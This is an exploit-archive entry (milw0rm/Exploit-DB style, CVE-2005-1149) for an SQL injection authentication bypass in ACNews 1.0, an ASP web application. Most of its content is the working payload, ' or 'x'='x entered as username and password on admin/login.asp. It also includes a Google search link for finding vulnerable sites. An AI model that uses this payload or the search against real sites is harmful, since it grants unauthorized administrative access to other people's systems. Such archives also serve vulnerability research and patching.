[] NeoSense

ACNews 1.0 - Authentication Bypass

Author: LaMeR
type: webapps
platform: asp
port: 
date_added: 2005-04-08 
date_updated:  
verified: 1 
codes: OSVDB-15494;CVE-2005-1149 
tags: 
aliases:  
screenshot_url:  
application_url: 

# http://www.google.com/search?hl=en&lr=&q=acnews+1.0+login.asp&btnG=Search
# /str0ke

Product:ACNews
version :1.0
VULNERABILITY CLASS: SQL injection

[exploit]
Log in with
username:' or 'x'='x
password :' or 'x'='x
from admin/login.asp page.

greetz to HaXoR & LOverboy

auther : LaMeR

securitygurus team

# milw0rm.com [2005-04-09]